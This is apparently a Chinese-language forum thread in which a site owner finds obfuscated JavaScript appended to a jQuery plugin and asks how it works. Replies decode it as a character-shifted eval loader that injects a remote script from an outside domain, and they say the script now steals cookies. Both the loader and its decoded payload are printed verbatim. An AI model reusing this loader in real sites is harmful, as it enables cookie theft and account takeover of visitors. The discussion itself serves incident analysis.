最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码
var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);
请问这种原理是什么 怎么能够防范
你的jquery插件下载的时候就有这个。
你的网站被黑了。
前面的密文其实就是字符串的unicode码往前减一。
解密后是这个东西
document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");往页面中插入了一个远程js,是一个典型的xss攻击案例,为了规避waf,他并没有使用标准script脚本,以上代码直接执行不会直接加载,而是会在加载下个js脚本的同时加载进来这个远程脚本。
我去看下了下,现在已经不是弹中奖了,而是直接获取cookies,通过cookies可以直接登陆你的账号,如果你的账号是管理员的话。。。
服务器被人入侵了吧?